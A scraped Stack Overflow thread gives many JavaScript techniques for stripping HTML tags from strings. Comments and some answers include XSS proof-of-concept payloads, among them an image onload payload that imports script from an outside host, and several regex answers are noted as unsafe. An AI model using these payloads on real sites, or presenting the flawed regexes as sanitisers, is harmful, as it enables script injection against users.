Strip HTML tags from text using plain JavaScript

Question

How to strip off HTML tags from a string using plain JavaScript only, not using a library?

Black · Accepted Answer · 2020-10-23 14:11:18Z

922

If you're running in a browser, then the easiest way is just to let the browser do it for you...

function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.

edited Oct 23, 2020 at 14:11

Black

20.9k47 gold badges188 silver badges300 bronze badges

answered May 4, 2009 at 22:48

Shog9

160k36 gold badges237 silver badges242 bronze badges

Sign up to request clarification or add additional context in comments.

19 Comments

kangax Over a year ago

Just remember that this approach is rather inconsistent and will fail to strip certain characters in certain browsers. For example, in Prototype.js, we use this approach for performance, but work around some of the deficiencies - github.com/kangax/prototype/blob/…

Magnus Smith Over a year ago

Remember your whitespace will be messed about. I used to use this method, and then had problems as certain product codes contained double spaces, which ended up as single spaces after I got the innerText back from the DIV. Then the product codes did not match up later in the application.

Shog9 Over a year ago

@Magnus Smith: Yes, if whitespace is a concern - or really, if you have any need for this text that doesn't directly involve the specific HTML DOM you're working with - then you're better off using one of the other solutions given here. The primary advantages of this method are that it is 1) trivial, and 2) will reliably process tags, whitespace, entities, comments, etc. in the same way as the browser you're running in. That's frequently useful for web client code, but not necessarily appropriate for interacting with other systems where the rules are different.

Mike Samuel Over a year ago

Don't use this with HTML from an untrusted source. To see why, try running strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

douyw Over a year ago

If html contains images(img tags), the images will be requested by the browser. That's not good.

|

Mike Samuel · Accepted Answer · 2019-05-30 09:28:35Z

807

myString.replace(/<[^>]*>?/gm, '');

edited May 30, 2019 at 9:28

Mike Samuel

121k30 gold badges230 silver badges255 bronze badges

answered May 4, 2009 at 22:42

nickf

548k199 gold badges660 silver badges727 bronze badges

24 Comments

Mike Samuel Over a year ago

Doesn't work for <img src=http://www.google.com.kh/images/srpr/nav_logo27.png onload="alert(42)" if you're injecting via document.write or concatenating with a string that contains a > before injecting via innerHTML.

Mike Samuel Over a year ago

@PerishableDave, I agree that the > will be left in the second. That's not an injection hazard though. The hazard occurs due to < left in the first, which causes the HTML parser to be in a context other than data state when the second starts. Note there is no transition from data state on >.

Ziggy Over a year ago

@MikeSamuel Did we decide on this answer yet? Naive user here ready to copy-paste.

Jonathon Over a year ago

This also, I believe, gets completely confused if given something like <button onClick="dostuff('>');"></button> Assuming correctly written HTML, you still need to take into account that a greater than sign might be somewhere in the quoted text in an attribute. Also you would want to remove all the text inside of <script> tags, at least.

Mike Samuel Over a year ago

@AntonioMax, I've answered this question ad nauseam, but to the substance of your question, because security critical code shouldn't be copied & pasted. You should download a library, and keep it up-to-date and patched so that you're secure against recently discovered vulnerabilities and to changes in browsers.

|

starball · Accepted Answer · 2022-12-27 01:09:05Z

330

I would like to share an edited version of the Shog9's approved answer.

As Mike Samuel pointed with a comment, that function can execute inline javascript code.
But Shog9 is right when saying "let the browser do it for you..."

so.. here my edited version, using DOMParser:

function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}

here the code to test the inline javascript:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Also, it does not request resources on parse (like images)

strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")

edited Dec 27, 2022 at 1:09

starball♦

59.4k52 gold badges312 silver badges1k bronze badges

answered Nov 6, 2017 at 15:46

Sabaz

5,3722 gold badges21 silver badges26 bronze badges

11 Comments

kris_IV Over a year ago

It's worth to add that this solution work only in browser.

Daantje Over a year ago

This is not strip tags, but more like PHP htmlspecialchars(). Still useful for me.

Raine Revere Over a year ago

Note that this also removes whitespace from the beginning of the text.

törzsmókus Over a year ago

also, it does not try to parse html using regex

the_previ Over a year ago

This should be the accepted answer because it's the safest and fastest way to do

|

Community · Accepted Answer · 2012-08-24 18:18:28Z

279

Simplest way:

jQuery(html).text();

That retrieves all the text from a string of html.

edited Aug 24, 2012 at 18:18

CommunityBot

11 silver badge

answered Dec 26, 2011 at 1:26

Mark

2,9431 gold badge15 silver badges2 bronze badges

21 Comments

Mark Over a year ago

We always use jQuery for projects since invariably our projects have a lot of Javascript. Therefore we didn't add bulk, we took advantage of existing API code...

Rafael Herscovici Over a year ago

You use it, but the OP might not. the question was about Javascript NOT JQuery.

acjay Over a year ago

It's still a useful answer for people who need to do the same thing as the OP (like me) and don't mind using jQuery (like me), not to mention, it could have been useful to the OP if they were considering using jQuery. The point of the site is to share knowledge. Keep in mind that the chilling effect you might have by chastising useful answers without good reason.

Eric G Over a year ago

@Dementic shockingly, I find the threads with multiple answers to be the most useful, because often a secondary answer meets my exact needs, while the primary answer meets the general case.

Aamir Afridi Over a year ago

That will not work if you some part of string is not wrapped in html tag. e.g. "<b>Error:</b> Please enter a valid email" will return only "Error:"

|

Black · Accepted Answer · 2020-10-23 14:47:34Z

61

As an extension to the jQuery method, if your string might not contain HTML (eg if you are trying to remove HTML from a form field)

jQuery(html).text();

will return an empty string if there is no HTML

Use:

jQuery('<p>' + html + '</p>').text();

instead.

Update: As has been pointed out in the comments, in some circumstances this solution will execute javascript contained within html if the value of html could be influenced by an attacker, use a different solution.

edited Oct 23, 2020 at 14:47

Black

20.9k47 gold badges188 silver badges300 bronze badges

answered Jan 15, 2013 at 12:20

user999305

1,01310 silver badges15 bronze badges

3 Comments

Dimitar Dimitrov Over a year ago

Or $("<p>").html(html).text();

Simon Over a year ago

This still executes probably dangerous code jQuery('<span>Text :) <img src="a" onerror="alert(1)"></span>').text()

Grzegorz Kaczan Over a year ago

try jQuery("aa&#X003c;script>alert(1)&#X003c;/script>a").text();

Victor · Accepted Answer · 2015-06-18 14:21:56Z

50

Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact

The above function posted by hypoxide works fine, but I was after something that would basically convert HTML created in a Web RichText editor (for example FCKEditor) and clear out all HTML but leave all the Links due the fact that I wanted both the HTML and the plain text version to aid creating the correct parts to an STMP email (both HTML and plain text).

After a long time of searching Google myself and my collegues came up with this using the regex engine in Javascript:

str='this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
';
str=str.replace(/<br>/gi, "\n");
str=str.replace(/<p.*>/gi, "\n");
str=str.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<(?:.|\s)*?>/g, "");

the str variable starts out like this:

this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>

and then after the code has run it looks like this:-

this string has html code i want to remove
Link Number 1 -> BBC (Link->http://www.bbc.co.uk)  Link Number 1


Now back to normal text and stuff

As you can see the all the HTML has been removed and the Link have been persevered with the hyperlinked text is still intact. Also I have replaced the <p> and <br> tags with \n (newline char) so that some sort of visual formatting has been retained.

To change the link format (eg. BBC (Link->http://www.bbc.co.uk) ) just edit the $2 (Link->$1), where $1 is the href URL/URI and the $2 is the hyperlinked text. With the links directly in body of the plain text most SMTP Mail Clients convert these so the user has the ability to click on them.

Hope you find this useful.

edited Jun 18, 2015 at 14:21

Victor

3,6312 gold badges22 silver badges22 bronze badges

answered Aug 6, 2009 at 8:30

Jibberboy2000

6445 silver badges6 bronze badges

2 Comments

Rose Nettoyeur Over a year ago

It doesn't handle " "

törzsmókus Over a year ago

obligatory caveat: stackoverflow.com/a/1732454/501765

Janghou · Accepted Answer · 2018-09-19 15:26:03Z

37

An improvement to the accepted answer.

function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

This way something running like this will do no harm:

strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")

Firefox, Chromium and Explorer 9+ are safe. Opera Presto is still vulnerable. Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.

edited Sep 19, 2018 at 15:26

answered Jul 31, 2013 at 20:14

Janghou

1,9031 gold badge23 silver badges32 bronze badges

6 Comments

Arth Over a year ago

This is some of the way there, but isn't safe from <script><script>alert();

Janghou Over a year ago

That doesn't run any scripts here in Chromium/Opera/Firefox on Linux, so why isn't it safe?

Arth Over a year ago

My apologies, I must have miss-tested, I probably forgot to click run again on the jsFiddle.

Jon Schneider Over a year ago

The "New" argument is superfluous, I think?

Janghou Over a year ago

According to the specs it's optional nowadays, but it wasn't always.

|

Karl.S · Accepted Answer · 2023-07-06 23:18:22Z

36

This should do the work on any Javascript environment (NodeJS included).

    const text = `
    <html lang="en">
      <head>
        <style type="text/css">*{color:red}</style>
        <script>alert('hello')</script>
      </head>
      <body><b>This is some text</b><br/><body>
    </html>`;
    
    // Remove style tags and content
    text.replace(/<style[^>]*>.*<\/style>/g, '')
        // Remove script tags and content
        .replace(/<script[^>]*>.*<\/script>/g, '')
        // Remove all opening, closing and orphan HTML tags
        .replace(/<[^>]+>/g, '')
        // Remove leading spaces and repeated CR/LF
        .replace(/([\r\n]+ +)+/g, '');

edited Jul 6, 2023 at 23:18

answered Jan 20, 2017 at 5:49

Karl.S

2,4201 gold badge30 silver badges33 bronze badges

6 Comments

Karl.S Over a year ago

@pstanton could you give a working example of your statement ?

pstanton Over a year ago

<html><style..>* {font-family:comic-sans;}</style>Some Text</html>

Karl.S Over a year ago

@pstanton I have fixed the code and added comments, sorry for the late response.

törzsmókus Over a year ago

please consider reading these caveats: stackoverflow.com/a/1732454/501765

mickmackusa Over a year ago

Since there are no start of string or end of string anchors, the m pattern modifier is pointless. Since the first two patterns have common starts and finished, perhaps consolidate them by capturing the tagname and then using a backreference for the ending tag.

|

hegemon · Accepted Answer · 2018-07-06 10:39:57Z

23

var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

This is a regex version, which is more resilient to malformed HTML, like:

Unclosed tags

Some text <img

"<", ">" inside tag attributes

Some text <img alt="x > y">

Newlines

Some <a href="http://google.com">

The code

var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");

answered Jul 6, 2018 at 10:39

hegemon

6,8242 gold badges34 silver badges31 bronze badges

2 Comments

Ade Over a year ago

How could you flip this to do literally the opposite? I want to use string.replace() on ONLY the text part, and leave any HTML tags and their attributes unchanged.

Leigh Mathieson Over a year ago

My personal favourite, I would also add to remove newlines like:

const deTagged = myString.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, '');     const deNewlined = deTagged.replace(/\n/g, '');

Community · Accepted Answer · 2017-05-23 11:54:58Z

19

I altered Jibberboy2000's answer to include several <BR /> tag formats, remove everything inside <SCRIPT> and <STYLE> tags, format the resulting HTML by removing multiple line breaks and spaces and convert some HTML-encoded code into normal. After some testing it appears that you can convert most of full web pages into simple text where page title and content are retained.

In the simple example,

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--comment-->

<head>

<title>This is my title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>

    body {margin-top: 15px;}
    a { color: #D80C1F; font-weight:bold; text-decoration:none; }

</style>
</head>

<body>
    <center>
        This string has <i>html</i> code i want to <b>remove</b><br>
        In this line <a href="http://www.bbc.co.uk">BBC</a> with link is mentioned.<br/>Now back to &quot;normal text&quot; and stuff using &lt;html encoding&gt;                 
    </center>
</body>
</html>

becomes

This is my title

This string has html code i want to remove

In this line BBC (http://www.bbc.co.uk) with link is mentioned.

Now back to "normal text" and stuff using

The JavaScript function and test page look this:

function convertHtmlToText() {
    var inputText = document.getElementById("input").value;
    var returnText = "" + inputText;

    //-- remove BR tags and replace them with line break
    returnText=returnText.replace(/<br>/gi, "\n");
    returnText=returnText.replace(/<br\s\/>/gi, "\n");
    returnText=returnText.replace(/<br\/>/gi, "\n");

    //-- remove P and A tags but preserve what's inside of them
    returnText=returnText.replace(/<p.*>/gi, "\n");
    returnText=returnText.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 ($1)");

    //-- remove all inside SCRIPT and STYLE tags
    returnText=returnText.replace(/<script.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/script>/gi, "");
    returnText=returnText.replace(/<style.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/style>/gi, "");
    //-- remove all else
    returnText=returnText.replace(/<(?:.|\s)*?>/g, "");

    //-- get rid of more than 2 multiple line breaks:
    returnText=returnText.replace(/(?:(?:\r\n|\r|\n)\s*){2,}/gim, "\n\n");

    //-- get rid of more than 2 spaces:
    returnText = returnText.replace(/ +(?= )/g,'');

    //-- get rid of html-encoded characters:
    returnText=returnText.replace(/&nbsp;/gi," ");
    returnText=returnText.replace(/&amp;/gi,"&");
    returnText=returnText.replace(/&quot;/gi,'"');
    returnText=returnText.replace(/&lt;/gi,'<');
    returnText=returnText.replace(/&gt;/gi,'>');

    //-- return
    document.getElementById("output").value = returnText;
}

It was used with this HTML:

<textarea id="input" style="width: 400px; height: 300px;"></textarea><br />
<button onclick="convertHtmlToText()">CONVERT</button><br />
<textarea id="output" style="width: 400px; height: 300px;"></textarea><br />

edited May 23, 2017 at 11:54

CommunityBot

11 silver badge

answered Jan 10, 2012 at 12:59

Lenka Pitonakova

1,12315 silver badges15 bronze badges

6 Comments

Daniel Gerson Over a year ago

I like this solution because it has treatment of html special characters... but still not nearly enough of them... the best answer for me would deal with all of them. (which is probably what jquery does).

cbron Over a year ago

I think /<p.*>/gi should be /<p.*?>/gi.

Alexis Wilke Over a year ago

Note that to remove all <br> tags you could use a good regular expression instead: /<br\s*\/?>/ that way you have just one replace instead of 3. Also it seems to me that except for the decoding of entities you can have a single regex, something like this: /<[a-z].*?\/?>/.

Hristo Enev Over a year ago

Nice script. But what about table content? Any idea how can it be displayed

KyleMit Over a year ago

@DanielGerson, encoding html gets real hairy, real quick, but the best approach seems to be using the he library

|

Anatol Zakrividoroga · Accepted Answer · 2020-10-27 06:03:14Z

16

from CSS tricks:

https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

const originalString = `
  <div>
    <p>Hey that's <span>somthing</span></p>
  </div>
`;

const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

console.log(strippedString);

edited Oct 27, 2020 at 6:03

answered Sep 3, 2020 at 15:52

Anatol Zakrividoroga

4,6082 gold badges36 silver badges57 bronze badges

1 Comment

Guillaume F. Over a year ago

This fails to remove what is inside <script> and <style> tags but otherwise it is the cleanest solution.

Ankit Kumawat · Accepted Answer · 2022-07-14 06:25:29Z

10

const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)

answered Jul 14, 2022 at 6:25

Ankit Kumawat

4516 silver badges16 bronze badges

1 Comment

Pawan Deore Over a year ago

doesn't work in next js as it is server side rendered but nice solution for traditional applications. use this instead - const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

Bryan · Accepted Answer · 2009-05-04 23:14:30Z

8

Another, admittedly less elegant solution than nickf's or Shog9's, would be to recursively walk the DOM starting at the <body> tag and append each text node.

var bodyContent = document.getElementsByTagName('body')[0];
var result = appendTextNodes(bodyContent);

function appendTextNodes(element) {
    var text = '';

    // Loop through the childNodes of the passed in element
    for (var i = 0, len = element.childNodes.length; i < len; i++) {
        // Get a reference to the current child
        var node = element.childNodes[i];
        // Append the node's value if it's a text node
        if (node.nodeType == 3) {
            text += node.nodeValue;
        }
        // Recurse through the node's children, if there are any
        if (node.childNodes.length > 0) {
            appendTextNodes(node);
        }
    }
    // Return the final result
    return text;
}

answered May 4, 2009 at 23:14

Bryan

2,85525 gold badges39 silver badges45 bronze badges

3 Comments

nickf Over a year ago

yikes. if you're going to create a DOM tree out of your string, then just use shog's way!

Bryan Over a year ago

Yes, my solution wields a sledge-hammer where a regular hammer is more appropriate :-). And I agree that yours and Shog9's solutions are better, and basically said as much in the answer. I also failed to reflect in my response that the html is already contained in a string, rendering my answer essentially useless as regards the original question anyway. :-(

Shog9 Over a year ago

To be fair, this has value - if you absolutely must preserve /all/ of the text, then this has at least a decent shot at capturing newlines, tabs, carriage returns, etc... Then again, nickf's solution should do the same, and do much faster... eh.

gyula.nemeth · Accepted Answer · 2016-08-04 07:38:10Z

If you want to keep the links and the structure of the content (h1, h2, etc) then you should check out TextVersionJS You can use it with any HTML, although it was created to convert an HTML email to plain text.

The usage is very simple. For example in node.js:

var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";

var textVersion = createTextVersion(yourHtml);

Or in the browser with pure js:

<script src="textversion.js"></script>
<script>
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
</script>

It also works with require.js:

define(["textversionjs"], function(createTextVersion) {
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
});

AkshayBandivadekar · Accepted Answer · 2020-04-07 13:33:59Z

6

For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");

answered Apr 7, 2020 at 13:33

AkshayBandivadekar

85010 silver badges18 bronze badges

1 Comment

mickmackusa Over a year ago

Which characters in your pattern are made case-insensitive by that i pattern modifier? I see no need for capturing parentheses -- anywhere in the pattern. Bad copy-pasta? Maybe someone should whisper to Chris Coyier.

Johannes Fahrenkrug · Accepted Answer · 2021-11-09 14:26:55Z

6

It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:

var htmlparser = require('htmlparser2');

var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';

var result = [];

var parser = new htmlparser.Parser({
    ontext: function(text){
        result.push(text);
    }
}, {decodeEntities: true});

parser.write(body);
parser.end();

result.join('');

The output will be This is a simple example.

See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html

This works in both node and the browser if you pack your web application using a tool like webpack.

edited Nov 9, 2021 at 14:26

answered Dec 29, 2015 at 19:11

Johannes Fahrenkrug

45.1k21 gold badges135 silver badges174 bronze badges

Comments

Harry Stevens · Accepted Answer · 2017-01-27 06:55:53Z

A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.

function removeTags(string, array){
  return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
  function f(array, value){
    return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
  }
}

var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>

Jaxolotl · Accepted Answer · 2011-10-04 14:02:41Z

4

I made some modifications to original Jibberboy2000 script Hope it'll be usefull for someone

str = '**ANY HTML CONTENT HERE**';

str=str.replace(/<\s*br\/*>/gi, "\n");
str=str.replace(/<\s*a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<\s*\/*.+?>/ig, "\n");
str=str.replace(/ {2,}/gi, " ");
str=str.replace(/\n+\s*/gi, "\n\n");

answered Oct 4, 2011 at 14:02

Jaxolotl

491 bronze badge

Comments

Deminetix · Accepted Answer · 2015-06-11 22:06:11Z

4

After trying all of the answers mentioned most if not all of them had edge cases and couldn't completely support my needs.

I started exploring how php does it and came across the php.js lib which replicates the strip_tags method here: http://phpjs.org/functions/strip_tags/

answered Jun 11, 2015 at 22:06

Deminetix

2,97429 silver badges22 bronze badges

2 Comments

Alexis Wilke Over a year ago

This is a neat function and well documented. However, it can be made faster when allowed == '' which I think is what the OP asked for, which is nearly what Byron answered below (Byron only got the [^>] wrong.)

Chris Cinelli Over a year ago

If you use the allowed param you are vulnerable to XSS: stripTags('<p onclick="alert(1)">mytext</p>', '<p>') returns <p onclick="alert(1)">mytext</p>

3 revs, 2 users 91% · Accepted Answer · 2016-03-27 07:29:37Z

4

function stripHTML(my_string){
    var charArr   = my_string.split(''),
        resultArr = [],
        htmlZone  = 0,
        quoteZone = 0;
    for( x=0; x < charArr.length; x++ ){
     switch( charArr[x] + htmlZone + quoteZone ){
       case "<00" : htmlZone  = 1;break;
       case ">10" : htmlZone  = 0;resultArr.push(' ');break;
       case '"10' : quoteZone = 1;break;
       case "'10" : quoteZone = 2;break;
       case '"11' : 
       case "'12" : quoteZone = 0;break;
       default    : if(!htmlZone){ resultArr.push(charArr[x]); }
     }
    }
    return resultArr.join('');
}

Accounts for > inside attributes and <img onerror="javascript"> in newly created dom elements.

usage:

clean_string = stripHTML("string with <html> in it")

demo:

https://jsfiddle.net/gaby_de_wilde/pqayphzd/

demo of top answer doing the terrible things:

https://jsfiddle.net/gaby_de_wilde/6f0jymL6/1/

edited Mar 27, 2016 at 7:29

community wiki

3 revs, 2 users 91%
user40521

1 Comment

Logan Pickup Over a year ago

You'll need to handle escaped quotes inside an attribute value too (e.g. string with <a malicious="attribute \">this text should be removed, but is not">example</a>).

AmerllicA · Accepted Answer · 2022-11-19 19:43:18Z

4

A very good library would be sanitize-html which is a pure JavaScript function and it could help in any environment.

My case was on React Native I needed to remove all HTML tags from the given texts. so I created this wrapper function:

import sanitizer from 'sanitize-html';

const textSanitizer = (textWithHTML: string): string =>
  sanitizer(textWithHTML, {
    allowedTags: [],
  });

export default textSanitizer;

Now by using my textSanitizer, I can have got the pure text contents.

answered Nov 19, 2022 at 19:43

AmerllicA

33.2k18 gold badges146 silver badges170 bronze badges

1 Comment

Zathrus Writer Over a year ago

so far the only NPM package that can sanitize som very strange HTML (such as

<iframe srcdoc="<script src='XXXXXXX'></script>" style="display: none" data-web="YYYYYYY" data-hash="ZZZZZZZZZZZZZ"></iframe>

Jeremy Johnstone · Accepted Answer · 2012-07-12 21:10:24Z

3

Here's a version which sorta addresses @MikeSamuel's security concern:

function strip(html)
{
   try {
       var doc = document.implementation.createDocument('http://www.w3.org/1999/xhtml', 'html', null);
       doc.documentElement.innerHTML = html;
       return doc.documentElement.textContent||doc.documentElement.innerText;
   } catch(e) {
       return "";
   }
}

Note, it will return an empty string if the HTML markup isn't valid XML (aka, tags must be closed and attributes must be quoted). This isn't ideal, but does avoid the issue of having the security exploit potential.

If not having valid XML markup is a requirement for you, you could try using:

var doc = document.implementation.createHTMLDocument("");

but that isn't a perfect solution either for other reasons.

edited Jul 12, 2012 at 21:10

answered Jul 12, 2012 at 20:38

Jeremy Johnstone

3481 silver badge6 bronze badges

1 Comment

Alexis Wilke Over a year ago

That will fail in many circumstances if the text comes from user input (textarea or contenteditable widget...)

FrigginGlorious · Accepted Answer · 2016-01-06 18:57:29Z

3

I just needed to strip out the <a> tags and replace them with the text of the link.

This seems to work great.

htmlContent= htmlContent.replace(/<a.*href="(.*?)">/g, '');
htmlContent= htmlContent.replace(/<\/a>/g, '');

edited Jan 6, 2016 at 18:57

answered Aug 19, 2013 at 16:12

FrigginGlorious

1092 silver badges6 bronze badges

2 Comments

m3nda Over a year ago

This only applies for a tags and needs tweaking for being a wide function.

Alexis Wilke Over a year ago

Yeah, plus an anchor tag could have many other attributes such as the title="...".

Samuel Eiche · Accepted Answer · 2023-06-07 15:31:26Z

3

To add to the DOMParser solution. Our team found that it was still possible to inject malicious script using the basic solution.

\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'

\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>

We found that it was best to parse it recursively if any tags still exist after the initial parse.

function stripHTML(str) {
  const parsedHTML = new DOMParser().parseFromString(str, "text/html");
  const text = parsedHTML.body.textContent;

  if (/(<([^>]+)>)/gi.test(text)) {
    return stripHTML(text);
  }

  return text || "";
}

answered Jun 7, 2023 at 15:31

Samuel Eiche

1759 bronze badges

Comments

Byron Carasco · Accepted Answer · 2011-01-10 05:40:34Z

2

I think the easiest way is to just use Regular Expressions as someone mentioned above. Although there's no reason to use a bunch of them. Try:

stringWithHTML = stringWithHTML.replace(/<\/?[a-z][a-z0-9]*[^<>]*>/ig, "");

answered Jan 10, 2011 at 5:40

Byron Carasco

1072 silver badges6 bronze badges

2 Comments

molnarg Over a year ago

Don't do this if you care about security. If the user input is this: '<scr<script>ipt>alert(42);</scr</script>ipt>' then the stripped version will be this: '<script>alert(42);</script>'. So this is an XSS vulnerability.

Alexis Wilke Over a year ago

You should change the [^<>] with [^>] because a valid tag cannot include a < character, then the XSS vulnerability disappears.

aWebDeveloper · Accepted Answer · 2015-07-14 12:56:53Z

2

Below code allows you to retain some html tags while stripping all others

function strip_tags(input, allowed) {

  allowed = (((allowed || '') + '')
    .toLowerCase()
    .match(/<[a-z][a-z0-9]*>/g) || [])
    .join(''); // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)

  var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
      commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;

  return input.replace(commentsAndPhpTags, '')
      .replace(tags, function($0, $1) {
          return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
      });
}

answered Jul 14, 2015 at 12:56

aWebDeveloper

38.7k42 gold badges179 silver badges247 bronze badges

1 Comment

Chris Cinelli Over a year ago

You should quote the source (phpjs). If you use the allowed param you are vulnerable to XSS: stripTags('<p onclick="alert(1)">mytext</p>', '<p>') returns <p onclick="alert(1)">mytext</p>

basarat · Accepted Answer · 2016-05-27 00:12:48Z

2

The accepted answer works fine mostly, however in IE if the html string is null you get the "null" (instead of ''). Fixed:

function strip(html)
{
   if (html == null) return "";
   var tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}

answered May 27, 2016 at 0:12

basarat

278k60 gold badges475 silver badges528 bronze badges

Comments

Community · Accepted Answer · 2020-06-20 09:12:55Z

2

A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.

function stripHtml(unsafe) {
    return $($.parseHTML(unsafe)).text();
}

Can safely strip html from:

<img src="unknown.gif" onerror="console.log('running injections');">

And other exploits.

nJoy!

edited Jun 20, 2020 at 9:12

CommunityBot

11 silver badge

answered Mar 25, 2019 at 20:44

nickl-

8,8004 gold badges44 silver badges58 bronze badges

Comments

jnaklaas · Accepted Answer · 2021-07-05 09:31:20Z

2

If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.

import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one

striptags('<p>An HTML string</p>');

answered Jul 5, 2021 at 9:31

jnaklaas

1,80916 silver badges17 bronze badges

Comments

Bitdom8 · Accepted Answer · 2022-04-16 10:26:06Z

2

const strip=(text) =>{
    return (new DOMParser()?.parseFromString(text,"text/html"))
    ?.body?.textContent
}

const value=document.getElementById("idOfEl").value

const cleanText=strip(value)

edited Apr 16, 2022 at 10:26

Bitdom8

1,4821 gold badge14 silver badges24 bronze badges

answered Jan 19, 2022 at 8:53

Yilmaz

51k19 gold badges226 silver badges278 bronze badges

Collectives™ on Stack Overflow

Strip HTML tags from text using plain JavaScript

46 Answers 46

19 Comments

24 Comments

11 Comments

21 Comments

3 Comments

Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact

2 Comments

6 Comments

6 Comments

2 Comments

6 Comments

1 Comment

1 Comment

3 Comments

Comments

1 Comment

Comments

Comments

Comments

2 Comments

1 Comment

1 Comment

1 Comment

2 Comments

Comments

2 Comments

1 Comment

Comments

Comments

Comments

Comments

Linked

Hot Network Questions

Collectives™ on Stack Overflow

46 Answers 46

19 Comments

24 Comments

11 Comments

21 Comments

3 Comments

Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact

2 Comments

6 Comments

6 Comments

2 Comments

6 Comments

1 Comment

1 Comment

3 Comments

Comments

1 Comment

Comments

Comments

Comments

2 Comments

1 Comment

1 Comment

1 Comment

2 Comments

Comments

2 Comments

1 Comment

Comments

Comments

Comments

Comments

Linked

Related